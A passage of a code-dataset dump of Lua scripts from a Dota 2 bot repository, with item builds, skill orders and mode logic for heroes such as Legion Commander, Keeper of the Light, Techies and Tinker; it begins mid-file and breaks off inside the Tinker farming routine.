ITEM_SLOT_TYPE_MAIN then\n\t\tcyclone = npcBot:GetItemInSlot(cycloneLoc)\n\tend\n\tif npcBot:GetItemSlotType(midasLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tmidas = npcBot:GetItemInSlot(midasLoc)\n\tend\n\t\n\tif bountyTopRadDist < 200 and bountyTopRadDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_1)\n\telseif bountyBotRadDist < 200 and bountyBotRadDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_2)\n\telseif bountyTopDirDist < 200 and bountyTopDirDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_3)\n\telseif bountyBotDirDist < 200 and bountyBotDirDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_4)\n\tend\n\t\n\tif midas ~= nil then\n\t\tlocal midasTarget = _G.getMidasTarget(npcBot)\n\t\t\n\t\tif midas:IsCooldownReady() and not npcBot:IsChanneling() and botAction ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\t\tnpcBot:Action_UseAbilityOnEntity(midas, midasTarget)\n\t\tend\n\tend\n\t\n\tif roar ~= nil and roar:IsFullyCastable() and botAction ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tlocal nearbyEnemies = npcBot:GetNearbyHeroes(350, true, BOT_MODE_NONE)\n\t\t\n\t\tif table.getn(nearbyEnemies) > 0 then\n\t\t\tnpcBot:Action_UseAbility(roar)\n\t\tend\n\tend\n\t\n\t-- Drop Clarities and Salves if boots acquired\n\tif arcane ~= nil then\n\t\tif clarity ~= nil then\n\t\t\tnpcBot:Action_DropItem(clarity, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\t\tif salve ~= nil then\n\t\t\tnpcBot:Action_DropItem(salve, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\t\tif tango ~= nil then\n\t\t\tnpcBot:Action_DropItem(tango, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\t\tif portal ~= nil then\n\t\t\tnpcBot:Action_DropItem(portal, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\tend\n\t\n\tif cyclone ~= nil and cyclone:IsCooldownReady() and currentMode == BOT_MODE_RETREAT then\n\t\tif table.getn(enemies) > 0 then\n\t\t\tnpcBot:Action_UseAbilityOnEntity(cyclone, enemies[1])\n\t\tend\n\tend\n\n\tif botMana < spirit:GetManaCost() and not npcBot:HasModifier(\"modifier_clarity_potion\") and not npcBot:IsChanneling() then\n\t\tif arcane ~= nil and arcane:IsCooldownReady() then\n\t\t\tprint(\" Using ARCANE BOOTS\")\n \t\tnpcBot:Action_UseAbility(arcane)\n\t\telseif (bottle == nil and clarity ~= nil) or (bottle ~= nil and bottle:GetCurrentCharges() == 0 and clarity ~= nil) or boots == nil then\n \t\tnpcBot:Action_UseAbilityOnEntity(clarity, npcBot)\n \telseif soul ~= nil and botHP/botMaxHP >= 0.4 and not npcBot:HasModifier(\"modifier_item_soul_ring\") and not npcBot:HasModifier(\"modifier_item_soul_ring_buff\") then\n \t\tnpcBot:Action_UseAbility(soul)\n \tend\n end\n \n\tif botHP/botMaxHP < 0.5 and not npcBot:IsChanneling() then\n\t\tif salve ~= nil and not npcBot:HasModifier(\"modifier_flask_healing\") then\n\t\t\tnpcBot:Action_UseAbilityOnEntity(salve, npcBot)\n\t\telseif bottle ~= nil and bottle:GetCurrentCharges() > 0 and npcBot:DistanceFromFountain() ~= 0 then\n\t\t\tnpcBot:Action_UseAbility(bottle)\n\t\telseif tango ~= nil and #nearbyTrees > 0 and not npcBot:HasModifier(\"modifier_tango_heal\") then\n\t\t\tnpcBot:Action_UseAbilityOnTree(tango, nearbyTrees[1])\n\t\tend\n\tend\n\n -- Use courier if in inventory\n\tif courierLoc ~= nil then\n\t\tlocal courier = npcBot:GetItemInSlot(courierLoc)\n\t\tif courier ~= nil then\n\t\t\tnpcBot:Action_UseAbility(courier)\n\t\tend\n\tend\n\t\n\t-- Use bottle if mana is low\n\tif bottleLoc ~= nil and not npcBot:IsChanneling() then\n\t\tbottle = npcBot:GetItemInSlot(bottleLoc)\n\t\tbottleSlot = npcBot:GetItemSlotType(bottleLoc)\n\t\t\n\t\tif bottle ~= nil and botMana/botMaxMana < 0.3 then\n\t\t\tif bottle:GetCurrentCharges() > 0 then\n\t\t\t\tnpcBot:Action_UseAbility(bottle)\n\t\t\tend\n\t\tend\n\tend\nend\n"
},
{
"alpha_fraction": 0.6296296119689941,
"alphanum_fraction": 0.6481481194496155,
"avg_line_length": 16.66666603088379,
"blob_id": "44d200231eab5d512409bcfbf01eeeeaad0d44ce",
"content_id": "3df48a5c10b809c73a6189b12bcb65cfb42bcc6b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 54,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 3,
"path": "/mode_rune_lone_druid.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "\n--function GetDesire()\n--\treturn _G.desires[0]\n--end\n"
},
{
"alpha_fraction": 0.7239709496498108,
"alphanum_fraction": 0.7312348484992981,
"avg_line_length": 18.66666603088379,
"blob_id": "b92682f3eefa17f794fce97d886e56b843004890",
"content_id": "40fae1d2cdbc1aba9c7148a3566b598167f4807c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 413,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 21,
"path": "/mode_laning_techies.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nlocal botLocArray = {}\n\nfunction OnStart()\n\tnpcBot.other_mode = BOT_MODE_LANING\n\tnpcBot:Action_ClearActions(true)\nend\n\nfunction GetDesire()\n local botLevel = npcBot:GetLevel();\n\n\tif botLevel < 6 then\n\t\treturn _G.desires[5]\n\telse\n\t\treturn _G.desires[0]\n\tend\nend\n"
},
{
"alpha_fraction": 0.5534949898719788,
"alphanum_fraction": 0.5872563123703003,
"avg_line_length": 22.909090042114258,
"blob_id": "9b92ad2fdcda5349ea5b5e7d90bcaab3f5d7dba2",
"content_id": "eddf178732401c7a28705b9e6a4f31425de99635",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 2103,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 88,
"path": "/item_build_legion_commander.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "X = {}\nrequire(GetScriptDirectory() .. \"/UtilityFunctions\")\nlocal npcBot = GetBot()\nlocal talents = fillTalentTable(npcBot)\n\nX[\"items\"] = {\n \"item_enchanted_mango\",\n \"item_enchanted_mango\",\n \"item_enchanted_mango\",\n \"item_tango\",\n \"item_tango\",\n \"item_stout_shield\",\n -- Soul Ring --\n \"item_ring_of_regen\",\n \"item_gauntlets\",\n \"item_gauntlets\",\n \"item_recipe_soul_ring\",\n -- phase boots --\n \"item_boots\",\n \"item_blades_of_attack\",\n \"item_blades_of_attack\",\n -- magic wand\n \"item_magic_stick\",\n \"item_branches\",\n \"item_branches\",\n \"item_recipe_magic_wand\",\n \"item_blink\",\n \"item_broadsword\",\n \"item_chainmail\",\n \"item_robe\",\n \"item_ogre_axe\",\n \"item_mithril_hammer\",\n \"item_recipe_black_king_bar\"\n}\n\nlocal odds = \"legion_commander_overwhelming_odds\"\nlocal press = \"legion_commander_press_the_attack\"\nlocal courage = \"legion_commander_moment_of_courage\"\nlocal duel = \"legion_commander_duel\"\n\n\n-- special_bonus_strength_8\n-- special_bonus_exp_boost_25\n-- special_bonus_attack_speed_30\n-- special_bonus_unique_legion_commander_4\n-- special_bonus_movement_speed_60\n-- special_bonus_unique_legion_commander_3\n-- special_bonus_unique_legion_commander\n-- special_bonus_unique_legion_commander_2\n-- legion_commander_overwhelming_odds\n-- legion_commander_press_the_attack\n-- legion_commander_moment_of_courage\n-- legion_commander_duel\n\nlocal t1 = \"special_bonus_exp_boost_25\"\nlocal t2 = \"special_bonus_attack_speed_30\"\nlocal t3 = \"special_bonus_movement_speed_60\"\nlocal t4 = \"special_bonus_unique_legion_commander\"\n\nX[\"skills\"] = {\n odds, -- 1\n courage, -- 2 \n odds, -- 3\n press, -- 4\n odds, -- 5\n duel, -- 6\n odds, -- 7\n press, -- 8\n press, -- 9\n t1, -- 10\n press, -- 11 \n duel, -- 12\n courage, -- 13\n courage, -- 14\n t2, -- 15\n courage, -- 16 \n \"-1\", -- 17\n duel, -- 18\n \"-1\", -- 19\t\n t3, -- 20\n \"-1\", -- 21 \t\n \"-1\", -- 22\n \"-1\", -- 23\n \"-1\", -- 24\n t4 -- 25\n}\n\nreturn X"
},
{
"alpha_fraction": 0.4931506812572479,
"alphanum_fraction": 0.5280821919441223,
"avg_line_length": 23.762712478637695,
"blob_id": "b3f33201562d1020acbd15b4fd7192ed56e71d58",
"content_id": "616fd44798b83fc28ababd01a969792e76d5296b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 1460,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 59,
"path": "/item_build_keeper_of_the_light.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "X = {}\nrequire(GetScriptDirectory() .. \"/UtilityFunctions\")\nlocal npcBot = GetBot()\nlocal talents = fillTalentTable(npcBot)\n\nX[\"items\"] = {\n\t\"item_boots\",\n \"item_ring_of_regen\",\n \"item_wind_lace\",\n \"item_staff_of_wizardry\",\n \"item_ring_of_health\",\n \"item_recipe_force_staff\",\n \"item_ogre_axe\",\n \"item_staff_of_wizardry\",\n \"item_blade_of_alacrity\",\n \"item_point_booster\",\n \"item_platemail\",\n \"item_energy_booster\",\n \"item_ring_of_health\",\n \"item_void_stone\",\n \"item_gem\"\n}\n\nlocal illuminate = \"keeper_of_the_light_illuminate\"\nlocal manaleak = \"keeper_of_the_light_mana_leak\"\nlocal chakra = \"keeper_of_the_light_chakra_magic\"\nlocal spiritform = \"keeper_of_the_light_spirit_form\"\nlocal recall = \"keeper_of_the_light_recall\"\nlocal blinding = \"keeper_of_the_light_blinding_light\"\n\nX[\"skills\"] = {\n illuminate, --1\n chakra, --2 \n chakra, --1\n illuminate, --4\n illuminate, --5\n chakra, --6\n illuminate, --7\n chakra, --8\n spiritform, --9\n talents[2], --10\n manaleak, --11\n manaleak, --12\n manaleak, --13\n manaleak, --14\n talents[3], --15\n spiritform, --16\n \"-1\", --17\n spiritform, --18\n \"-1\", --19\n talents[5], --20\n \"-1\", \t --21\n \"-1\", \t --22\n \"-1\", --23\n \"-1\", --24\n talents[8] --25\n}\n\nreturn X"
},
{
"alpha_fraction": 0.610188901424408,
"alphanum_fraction": 0.6285060048103333,
"avg_line_length": 22.30666732788086,
"blob_id": "d2f5ae7b72e4c3078df12307888f7d37ecca75c9",
"content_id": "370916e599e7e0df84b7c4bf8700cbcce804b9cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 1747,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 75,
"path": "/item_build_techies.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "X = {}\nrequire(GetScriptDirectory() .. \"/UtilityFunctions\");\nlocal npcBot = GetBot();\nlocal talents = fillTalentTable(npcBot);\n\nX[\"items\"] = {\n\t\"item_enchanted_mango\",\n\t\"item_sobi_mask\",\n\t\"item_clarity\",\n\t\"item_ring_of_regen\",\n\t\"item_boots\",\n\t\"item_energy_booster\",\n\t\"item_point_booster\",\n\t\"item_staff_of_wizardry\",\n\t\"item_recipe_force_staff\",\n\t\"item_wind_lace\",\n\t\"item_void_stone\",\n\t\"item_staff_of_wizardry\",\n\t\"item_recipe_cyclone\",\n\t\"item_energy_booster\",\n\t\"item_vitality_booster\",\n\t\"item_recipe_bloodstone\",\n\t\"item_point_booster\",\n\t\"item_ogre_axe\",\n\t\"item_staff_of_wizardry\",\n\t\"item_blade_of_alacrity\",\n\t\"item_void_stone\",\n\t\"item_ultimate_orb\",\n\t\"item_mystic_staff\"\n};\n\n-- Set up Skill build\nlocal prox_mines = \"techies_land_mines\";\nlocal stasis_trap = \"techies_stasis_trap\";\nlocal blast_off = \"techies_suicide\";\nlocal remote_mines = \"techies_remote_mines\"; \n\nlocal ABILITY1 = \"special_bonus_mp_regen_2\"\nlocal ABILITY2 = \"special_bonus_movement_speed_20\"\nlocal ABILITY3 = \"special_bonus_cast_range_200\"\nlocal ABILITY4 = \"special_bonus_exp_boost_30\"\nlocal ABILITY5 = \"special_bonus_respawn_reduction_60\"\nlocal ABILITY6 = \"special_bonus_gold_income_20\"\nlocal ABILITY7 = \"special_bonus_unique_techies\"\nlocal ABILITY8 = \"special_bonus_cooldown_reduction_20\"\n\nX[\"skills\"] = {\n prox_mines, \n blast_off, \n prox_mines, \n blast_off, \n prox_mines,\n remote_mines, \n stasis_trap, \n blast_off, \n prox_mines, \n talents[2],\n stasis_trap, \n remote_mines, \n stasis_trap, \n stasis_trap, \n talents[3],\n blast_off, \n \"-1\", \n remote_mines, \n \"-1\", \t\n talents[6],\n \"-1\", \t\n \"-1\", \t\n \"-1\", \n \"-1\", \n talents[7]\n};\n\nreturn X"
},
{
"alpha_fraction": 0.6354639530181885,
"alphanum_fraction": 0.6480038166046143,
"avg_line_length": 37.82368469238281,
"blob_id": "3d0b86b57a3702f387e457a5763da622806e2ee1",
"content_id": "0415580060085ce9b704289e0d07f6f1970c619c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 14753,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 380,
"path": "/mode_farm_tinker.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\n\nlocal sequence = 0\n\nfunction GetDesire()\n\tlocal gameTime = DotaTime()\n\tlocal bootsSlot = npcBot:FindItemSlot(\"item_travel_boots\")\n\tif npcBot:GetItemSlotType(bootsSlot) == ITEM_SLOT_TYPE_MAIN or gameTime < 0 then\n\t\treturn _G.desires[6]\n\tend\n\t\n\treturn _G.desires[0]\nend\n\nfunction Think()\n\tlocal gameTime = DotaTime()\n\tlocal botLoc = npcBot:GetLocation()\n\tlocal action = npcBot:GetCurrentActionType()\n\tlocal botMana = npcBot:GetMana()\n\tlocal botHealth = npcBot:GetHealth()\n\tlocal botMaxHealth = npcBot:GetMaxHealth()\n\tlocal botMaxMana = npcBot:GetMaxMana()\n\tlocal botHPRegen = npcBot:GetHealthRegen()\n\tlocal botManaRegen = npcBot:GetManaRegen()\n\tlocal level = npcBot:GetLevel()\n\tlocal blinkSlot = npcBot:FindItemSlot(\"item_blink\")\n\tlocal bootsSlot = npcBot:FindItemSlot(\"item_travel_boots\")\n\tlocal currentGold = npcBot:GetGold()\n\tlocal currentLane = nil\n\t\n\tlocal boots = nil\n\tlocal blink = nil\n\tif npcBot:GetItemSlotType(bootsSlot) == ITEM_SLOT_TYPE_MAIN then\n\t\tboots = npcBot:GetItemInSlot(bootsSlot)\n\tend\n\tif npcBot:GetItemSlotType(blinkSlot) == ITEM_SLOT_TYPE_MAIN then\n\t\tblink = npcBot:GetItemInSlot(blinkSlot)\n\tend\n\t\n\tlocal towerStatusTopRad = _G.GetTowerStatus(\"top\", TEAM_RADIANT)\n\tlocal towerStatusMidRad = _G.GetTowerStatus(\"mid\", TEAM_RADIANT)\n\tlocal towerStatusBotRad = _G.GetTowerStatus(\"bot\", TEAM_RADIANT)\n\tlocal towerStatusTopDir = _G.GetTowerStatus(\"top\", TEAM_DIRE)\n\tlocal towerStatusMidDir = _G.GetTowerStatus(\"mid\", TEAM_DIRE)\n\tlocal towerStatusBotDir = _G.GetTowerStatus(\"bot\", TEAM_DIRE)\n\t\n\tlocal creepLaneTopRad = _G.GetLaneCreepStatus(LANE_TOP, TEAM_RADIANT)\n\tlocal creepLaneMidRad = _G.GetLaneCreepStatus(LANE_MID, TEAM_RADIANT)\n\tlocal creepLaneBotRad = _G.GetLaneCreepStatus(LANE_BOT, TEAM_RADIANT)\n\tlocal creepLaneTopDir = _G.GetLaneCreepStatus(LANE_TOP, TEAM_DIRE)\n\tlocal creepLaneMidDir = _G.GetLaneCreepStatus(LANE_MID, TEAM_DIRE)\n\tlocal creepLaneBotDir = _G.GetLaneCreepStatus(LANE_BOT, TEAM_DIRE)\n\t\n\tlocal laser = npcBot:GetAbilityByName(\"tinker_laser\");\n\tlocal missile = npcBot:GetAbilityByName(\"tinker_heat_seeking_missile\");\n\tlocal march = npcBot:GetAbilityByName(\"tinker_march_of_the_machines\");\n\tlocal rearm = npcBot:GetAbilityByName(\"tinker_rearm\");\n\t\n\tlocal allies = GetUnitList(UNIT_LIST_ALLIED_HEROES)\n\tlocal enemies = GetUnitList(UNIT_LIST_ENEMY_HEROES)\n\t\n\tlocal topFrontAmount = GetLaneFrontAmount(botTeam, LANE_TOP, false)\n\tlocal midFrontAmount = GetLaneFrontAmount(botTeam, LANE_MID, false)\n\tlocal botFrontAmount = GetLaneFrontAmount(botTeam, LANE_BOT, false)\n\t\n\tlocal topFrontLoc = GetLaneFrontLocation(botTeam, LANE_TOP, 0)\n\tlocal midFrontLoc = GetLaneFrontLocation(botTeam, LANE_MID, 0)\n\tlocal botFrontLoc = GetLaneFrontLocation(botTeam, LANE_BOT, 0)\n\t\n\tlocal enemyHeroes = GetUnitList(UNIT_LIST_ENEMY_HEROES)\n\tlocal topEnemies = 0\n\tlocal midEnemies = 0\n\tlocal botEnemies = 0\n\t\n\tfor e = 1, table.getn(enemyHeroes) do\n\t\tlocal enemy = enemyHeroes[e]\n\t\tif enemy ~= nil then\n\t\t\tlocal topDist = GetUnitToLocationDistance(enemy, topFrontLoc)\n\t\t\tlocal midDist = GetUnitToLocationDistance(enemy, midFrontLoc)\n\t\t\tlocal botDist = GetUnitToLocationDistance(enemy, botFrontLoc)\n\t\t\t\n\t\t\tif topDist < 1000 then\n\t\t\t\ttopEnemies = topEnemies + 1\n\t\t\tend\n\t\t\tif midDist < 1000 then\n\t\t\t\tmidEnemies = midEnemies + 1\n\t\t\tend\n\t\t\tif botDist < 1000 then\n\t\t\t\tbotEnemies = botEnemies + 1\n\t\t\tend\n\t\t\t\n\t\tend\n\tend\n\t\n\tif currentLane == nil then\n\t\tlocal lanes = {}\n \tif topFrontAmount <= midFrontAmount and topFrontAmount <= botFrontAmount then\n \t\ttable.insert(lanes, LANE_TOP)\n \t\tif midFrontAmount <= botFrontAmount then\n \t\t\ttable.insert(lanes, LANE_MID)\n \t\t\ttable.insert(lanes, LANE_BOT)\n \t\telse\n \t\t\ttable.insert(lanes, LANE_BOT)\n \t\t\ttable.insert(lanes, LANE_MID)\n \t\tend\n \telseif midFrontAmount <= topFrontAmount and midFrontAmount <= botFrontAmount then\n \t\ttable.insert(lanes, LANE_MID)\n \t\tif topFrontAmount <= botFrontAmount then\n \t\t \ttable.insert(lanes, LANE_TOP)\n \t\t\ttable.insert(lanes, LANE_BOT)\n \t\telse\n \t\t \ttable.insert(lanes, LANE_BOT)\n \t\t\ttable.insert(lanes, LANE_TOP)\n \t\tend\n \telseif botFrontAmount <= topFrontAmount and botFrontAmount <= midFrontAmount then\n \t\ttable.insert(lanes, LANE_BOT)\n \t\tif midFrontAmount <= topFrontAmount then\n \t\t \ttable.insert(lanes, LANE_MID)\n \t\t\ttable.insert(lanes, LANE_TOP)\n \t\telse\n \t\t \ttable.insert(lanes, LANE_TOP)\n \t\t\ttable.insert(lanes, LANE_MID)\n \t\tend\n \tend\n \n for l = 1, table.getn(lanes) do\n \tlocal lane = lanes[l]\n \t\n \tif lane == LANE_TOP then\n \t\tif topEnemies < 2 then\n \t\t\tcurrentLane = LANE_TOP\n \t\t\tbreak\n \t\tend\n \telseif lane == LANE_MID then\n \t\tif midEnemies < 2 then\n \t\t\tcurrentLane = LANE_MID\n \t\t\tbreak\n \t\tend\n \telse\n \t\tif botEnemies < 2 then\n \t\t\tcurrentLane = LANE_BOT\n \t\t\tbreak\n \t\tend\n \tend\n end\n end\n \n\tif currentLane ~= nil and gameTime > 0 and boots ~= nil and action ~= BOT_ACTION_TYPE_USE_ABILITY and not npcBot:IsChanneling() then\n\t\tlocal frontLoc = GetLaneFrontLocation(botTeam, currentLane, 200)\n\t\tlocal fountainLoc = GetShopLocation(GetTeam(), SHOP_HOME)\n\t\tlocal frontDist = GetUnitToLocationDistance(npcBot, frontLoc)\n\t\tlocal fountainDist = GetUnitToLocationDistance(npcBot, fountainLoc)\n\t\tlocal nearbyCreeps = npcBot:GetNearbyCreeps(1600, true)\n\t\tlocal nearbyEnemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n\t\t\n\t\tlocal numCreeps = table.getn(nearbyCreeps)\n\t\tlocal numEnemies = table.getn(nearbyEnemies)\n\t\t\n\t\tlocal marchMana = march:GetManaCost()\n\t\tlocal laserMana = laser:GetManaCost()\n\t\tlocal bootsMana = boots:GetManaCost()\n\t\t\n--\t\tlocal castedMarch = false\n-- local castedBlink = false\n-- \n-- local maxFountDist = 500\n-- local maxFrontDist = 500\n-- \n-- local queueSize = npcBot:NumQueuedActions()\n-- \n-- if not npcBot:IsChanneling() and queueSize == 0 then\n-- -- At Fountain\n-- if fountainDist < maxFountDist then\n-- if fountainDist < 300 then\n-- if botMana/botMaxMana > 0.75 then\n-- if boots:IsFullyCastable() then\n-- -- TP to lane\n-- print(\" Teleporting to Lane Front\")\n-- npcBot:Action_UseAbilityOnLocation(boots, frontLoc)\n-- else\n-- \tprint(\" Rearming!\")\n-- npcBot:Action_UseAbility(rearm)\n-- end\n-- end\n-- else\n-- -- Move to fountain\n-- print(\" Walking to Fountain\")\n-- npcBot:Action_MoveToLocation(fountainLoc)\n-- end\n-- -- At Lane Front\n-- elseif frontDist < maxFrontDist then\n-- -- Cast March\n-- if numCreeps > 0 and botMana >= (march:GetManaCost() + boots:GetManaCost() + rearm:GetManaCost()) then\n-- local distToPoint = GetUnitToLocationDistance(npcBot, nearbyCreeps[1]:GetLocation())\n-- \t\t\t\tlocal marchLoc = nearbyCreeps[1]:GetLocation()\n-- \t\t\t\tif distToPoint < 900 then\n-- \t\t\t\t\tif distToPoint >= 300 then\n-- \t\t\t\t\t\tmarchLoc = _G.getVectorBetweenTargetDistance(npcBot, nearbyCreeps[1], 300)\n-- \t\t\t\t\t\tnpcBot:Action_UseAbilityOnLocation(march, marchLoc)\n-- \t\t\t\t\telse\n-- \t\t\t\t\t\tnpcBot:Action_UseAbilityOnLocation(march, marchLoc)\n-- \t\t\t\t\tend\n-- \t\t\t\telse\n-- \t\t\t\t\tnpcBot:Action_MoveToLocation(marchLoc)\n-- \t\t\t\tend\n--\t\t\t\t\tprint(\" Casting March\")\n-- npcBot:Action_UseAbilityOnLocation(march, marchLoc)\n-- if botMana < (march:GetManaCost() + boots:GetManaCost() + rearm:GetManaCost()) then\n-- -- Don't cast March again if mana isn't enough\n-- print(\" Done Marching!\")\n-- castedMarch = true\n-- end\n-- -- Done Marching, TP to fountain\n-- elseif castedMarch then\n-- -- Queue rearm if boots is under cooldown\n-- if not boots:IsCooldownReady() then\n-- \tprint(\" Queueing Rearm AND TP to Fountain\")\n-- npcBot:ActionQueue_UseAbility(rearm)\n-- else\n-- \tprint(\" Teleporting to Fountain\")\n-- end\n-- npcBot:ActionQueue_UseAbilityOnLocation(boots, fountainLoc)\n-- -- Walk to Front\n-- elseif numCreeps == 0 and not castedMarch then\n-- \tprint(\" Walking to Front\")\n-- npcBot:Action_MoveToLocation(frontLoc)\n-- -- Can't do anything else but attack\n-- elseif numCreeps > 0 and not castedMarch and action ~= BOT_ACTION_TYPE_ATTACK then\n-- \tprint(\" Nothing To Do, Attacking Creeps\")\n-- npcBot:Action_AttackUnit(nearbyCreeps[1], true)\n-- elseif boots:IsFullyCastable() then\n-- \tnpcBot:Action_UseAbilityOnLocation(boots, fountainLoc)\n-- end\n-- end\n-- end\n\t\t\n\t\tprint(sequence)\n\t\t-- Return To Base\n\t\tif sequence == 0 then\n\t\t\tif boots:IsFullyCastable() and GetUnitToLocationDistance(npcBot, fountainLoc) > 1000 and not npcBot:IsChanneling() then\n\t\t\t\tprint(\"0: Casting Boots To Fountain\")\n\t\t\t\tnpcBot:Action_UseAbilityOnLocation(boots, fountainLoc)\n\t\t\t\tsequence = 1\n\t\t\telseif GetUnitToLocationDistance(npcBot, fountainLoc) <= 1000 then\n\t\t\t\tsequence = 1\n\t\t\telseif not boots:IsCooldownReady() and not npcBot:IsChanneling() then\n\t\t\t\tprint(\"0: REARMING!\")\n\t\t\t\tnpcBot:Action_UseAbility(rearm)\n\t\t\telseif not boots:IsFullyCastable() and not rearm:IsFullyCastable() then\n\t\t\t\tnpcBot:Action_MoveToLocation(fountainLoc)\n\t\t\tend\n\t\t-- Rearm\n\t\telseif sequence == 1 then\n\t\t\tif GetUnitToLocationDistance(npcBot, fountainLoc) <= 1000 \n\t\t\t\tand rearm:IsFullyCastable() \n\t\t\t\tand not npcBot:IsChanneling()\n\t\t\t\tand not boots:IsCooldownReady() then\n\t\t\t\tprint(\"1: REARMING!\")\n\t\t\t\tnpcBot:Action_UseAbility(rearm)\n\t\t\t\tsequence = 2\n\t\t\telseif GetUnitToLocationDistance(npcBot, fountainLoc) > 1000 then\n\t\t\t\tprint(\"1: Too Far From Fountain, Back to 0\")\n\t\t\t\tsequence = 0\n\t\t\telseif GetUnitToLocationDistance(npcBot, fountainLoc) <= 1000 \n\t\t\t\tand boots:IsCooldownReady() then\n\t\t\t\tprint(\"2: Waiting For Mana At Fountain\")\n\t\t\t\tsequence = 2\n\t\t\tend\n\t\t-- Wait For Mana\n\t\telseif sequence == 2 then\n\t\t\tif botMana/botMaxMana >= 0.8 then\n\t\t\t\tsequence = 3\n\t\t\tend\n\t\t-- TP To Lane Front\n\t\telseif sequence == 3 then\n\t\t\tif frontDist >= 500 and boots:IsFullyCastable() and not npcBot:IsChanneling() then\n\t\t\t\tprint(\"3: Casting Boots To Lane\")\n\t\t\t\tnpcBot:Action_UseAbilityOnLocation(boots, GetLaneFrontLocation(botTeam, currentLane, 200))\n\t\t\t\tsequence = 4\n\t\t\telseif not boots:IsFullyCastable() and rearm:IsFullyCastable() and not npcBot:IsChanneling() then\n\t\t\t\tprint(\"3: REARMING!\")\n\t\t\t\tnpcBot:Action_UseAbility(rearm)\n\t\t\telseif frontDist < 500 then\n\t\t\t\tsequence = 4\n\t\t\tend\n\t\t-- Blink If You Can!\n\t\telseif sequence == 4 then\n\t\t\tif blink ~= nil and numEnemies > 0 then\n\t\t\t\tif blink:IsFullyCastable() and not npcBot:IsChanneling() then\n\t\t\t\t\tprint(\"4: Time To Blink!\")\n--\t\t\t\t\tlocal trees = npcBot:GetNearbyTrees(1000)\n--\t\t\t\t\tlocal treeLocs = {}\n--\t\t\t\t\tfor tree in ipairs(trees) do\n--\t\t\t\t\t\ttable.insert(treeLocs, GetTreeLocation(tree))\n--\t\t\t\t\tend\n--\t\t\t\t\t\n--\t\t\t\t\tlocal centroids = _G.clusterAndGetCentroids(treeLocs)\n--\t\t\t\t\tprint(table.getn(centroids))\n--\t\t\t\t\tif table.getn(centroids) > 0 then\n--\t\t\t\t\t\tlocal closestDist = 0\n--\t\t\t\t\t\tlocal closestPoint = nil\n--\t\t\t\t\t\tfor centroid in ipairs(centroids) do\n--\t\t\t\t\t\t\tlocal dist = GetUnitToLocationDistance(npcBot, centroid)\n--\t\t\t\t\t\t\tif closestDist == 0 then\n--\t\t\t\t\t\t\t\tclosestDist = dist\n--\t\t\t\t\t\t\t\tclosestPoint = centroid\n--\t\t\t\t\t\t\telseif closestDist > dist then\n--\t\t\t\t\t\t\t\tclosestDist = dist\n--\t\t\t\t\t\t\t\tclosestPoint = centroid\n--\t\t\t\t\t\t\tend\n--\t\t\t\t\t\tend\n--\t\t\t\t\t\t\n--\t\t\t\t\t\tnpcBot:Action_UseAbilityOnLocation(blink, closestPoint)\n--\t\t\t\t\telse\n--\t\t\t\t\t\tnpcBot:Action_UseAbilityOnLocation(blink, fountain)\n--\t\t\t\t\tend\n\t\t\t\t\tnpcBot:Action_UseAbilityOnLocation(blink, fountainLoc)\n\t\t\t\t\tsequence = 5\n\t\t\t\tend\n\t\t\telse\n\t\t\t\tsequence = 5\n\t\t\tend\n\t\t-- Cast March In Creep Lane\n\t\telseif sequence == 5 then\n\t\t\tif march:IsFullyCastable() and botMana >= (marchMana + bootsMana) and numCreeps > 1 and not npcBot:IsChanneling() then\n\t\t\t\tprint(\"5: Casting March!\")\n\t\t\t\tlocal distToPoint = GetUnitToLocationDistance(npcBot, nearbyCreeps[1]:GetLocation())\n\t\t\t\tlocal marchLoc = nearbyCreeps[1]:GetLocation()\n\t\t\t\tprint(distToPoint)\n\t\t\t\tif distToPoint < 900 then\n\t\t\t\t\tif distToPoint >= 300 then\n\t\t\t\t\t\tmarchLoc = _G.getVectorBetweenTargetDistance(npcBot, nearbyCreeps[1], 300)\n\t\t\t\t\t\tnpcBot:Action_UseAbilityOnLocation(march, marchLoc)\n\t\t\t\t\telse\n\t\t\t\t\t\tnpcBot:Action_UseAbilityOnLocation(march, 